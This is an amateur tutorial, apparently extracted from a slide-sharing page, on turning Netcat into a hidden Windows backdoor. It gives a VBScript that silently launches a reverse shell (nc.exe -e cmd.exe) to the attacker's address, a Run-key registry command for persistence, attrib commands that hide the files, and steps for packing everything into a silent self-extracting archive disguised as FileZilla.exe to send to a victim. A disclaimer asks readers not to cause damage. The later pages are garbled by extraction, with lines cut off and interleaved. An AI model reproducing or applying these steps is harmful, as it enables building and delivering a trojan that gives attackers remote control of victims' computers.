8/8/2019 Netcat by Knight Crawler

http://slidepdf.com/reader/full/netcat-by-knight-crawler 1/9

 

Netcat as backdoor in Microsoft Windows

by

KnightCrawler

Thankx to Auditorsec and Ne011

for their time and support

8/8/2019 Netcat by Knight Crawler

http://slidepdf.com/reader/full/netcat-by-knight-crawler 2/9

1  Netcat as backdoor in Windows| KnightCrawler

Objective:

To use Netcat as a backdoor in Microsoft Windows.

Tools required:

Netcat

Download link: http://securityoverride.com/infusions/pro_download_panel/download.php?did=10 

Resource Hacker

Download link: http://en.kioskea.net/download/download-1536-reshack 

WinRAR

Download Link: http://www.rarlab.com/download.htm 

Note:

For this purpose I m using a bridged VirtualBox. You can try it there or in a real network.

I m using Windows XP Professional SP2.

Attacking machine:

Name: xp-attacker

Internal IP: 192.168.1.2

Victim machine:

Name: xp-victim

Internal IP: 192.168.1.3

DO NOT USE IT FOR DESTRUCTION PURPOSE BECAUSE WE ARE HERE TO LEARN.

THE AUTHOR TAKES NO RESPONSIBILITY OF ANY DAMAGE TO ANYONE OR ANYTHING.

8/8/2019 Netcat by Knight Crawler

http://slidepdf.com/reader/full/netcat-by-knight-crawler 3/9

2  Netcat as backdoor in Windows| KnightCrawler

Step 1:

Download the files and save them in the attacking machine.

Step 2:

Open notepad and make a .vbs file that will run our Netcat when the victim powers on his computer.

Save this file as anyname.vbs 

I have saved this file as file.vbs

Contents of the vbs file:

Const HIDDEN_WINDOW = 1

strComputer = "."

Set objStartup = GetObject("winmgmts:" _

& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup")

Set objProcess = GetObject("winmgmts:" _

& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")

Set objConfig = objStartup.SpawnInstance_

objConfig.ShowWindow = HIDDEN_WINDOW

errReturn = objProcess.Create("C:\windows\system32\nc.exe -d -e cmd.exe 192.168.1.2 4444", null,

objConfig, intProcessID)

C:\windows\system32\ Path where netcat file (nc.exe) is present & is to

be run.

192.168.1.2 Internal IP Address of the attacker

4444 Open port in attacker.

Step 3:

Now add a value in windows Registry so that file.vbs runs every time the system boots up.

For this open notepad and make a .cmd file that will add the required value to the registry.

Save this file as anyname.cmd

I have saved this file as addreg.cmd

8/8/2019 Netcat by Knight Crawler

http://slidepdf.com/reader/full/netcat-by-knight-crawler 4/9

3  Netcat as backdoor in Windows| KnightCrawler

Contents of the cmd file:

reg add HKLM\software\microsoft\windows\currentversion\run /f /v nc /d

C:\windows\system32\file.vbs

HKLM\software\microsoft\windows\currentversion\run Location in registry

/f Forces the entry to add in registry

/v nc Sets name of the entry

/d C:\windows\system32\file.vbs Sets the value of the entry

Step 4:

Now we create another .cmd file to run: nc.exe, file.vbs, addreg.cmd

And also to set the file attributes.

For this open notepad and make a .cmd file.

Save this file as anyname.cmd

I have saved this file as run.cmd

Contents of the cmd file:

attrib +s +h C:\windows\system32\nc.exe

attrib +s +h C:\windows \system32\file.vbs

attrib +s +h C:\windows \system32\addreg.cmd

attrib +s +h C:\windows \system32\run.cmd

file.vbs

addreg.cmd

attrib To set file attributes

+s Mark the file as system file

+h Mark the file as hidden

C:\windows\system32\ Location of the files

file.vbs Run this file

addreg.cmd Run this file

8/8/2019 Netcat by Knight Crawler

http://slidepdf.com/reader/full/netcat-by-knight-crawler 5/9

4  Netcat as backdoor in

Step 5:

Now we have to create our final

For this add all the files:

nc.exe, file.vbs, addreg.cmd, run

to the archive as shown below

Save this file as anyname.exe

Select Create SFX archive and L

I m using the name FileZilla.exe 

Windows| KnightCrawler

file that will be run on the victim’s computer.

.cmd

ck archive

because I will be using its icon later on.

8/8/2019 Netcat by Knight Crawler

http://slidepdf.com/reader/full/netcat-by-knight-crawler 6/9

5  Netcat as backdoor in

Now select SFX options from th

Now set Path to extract and Ru

Windows| KnightCrawler

Advanced tab.

after extraction in the General tab.

8/8/2019 Netcat by Knight Crawler

http://slidepdf.com/reader/full/netcat-by-knight-crawler 7/9

6  Netcat as backdoor in

Set the Silent mode to Hide all i

Set Update mode to Extract an

tab.

Windows| KnightCrawler

n the Modes tab.

replace files and Overwrite mode to Overwrit all files in Update 

8/8/2019 Netcat by Knight Crawler

http://slidepdf.com/reader/full/netcat-by-knight-crawler 8/9

7  Netcat as backdoor in

Press Ok twice and you will hav

Step 6:

Now we have to change its icon

For this we use Resource Hacker

Open resource hacker and then

Select icon group and there sele

Now click Open file with new ic

Now we have replaced the icon.

Save the file with a new name I

Step 7:

Send this file FileZilla.exe to the

Open netcat and run the followi

Nc –Lvp 444

Windows| KnightCrawler

your file FileZilla.exe

to attract the victim to open it.

.

open your file FileZilla.exe

ct the value, right-click on it and click Replace re

n. Then select the icon of your choice and click

hoose FileZilla.exe only and replaced the old fil

victim.

ng command.

source 

Replace.

with it.

8/8/2019 Netcat by Knight Crawler

http://slidepdf.com/reader/full/netcat-by-knight-crawler 9/9

8  Netcat as backdoor in

Step 8:

When the file FileZilla.exe is exe

control of the victim’s computer

The attacker’s screen will look s

Step 9:

And you are done☺ 

It is requested that you play saf 

Windows| KnightCrawler

cuted in the victim’s computer then the attacke

.

mething like this:

and don’t create havoc with this.

will get remote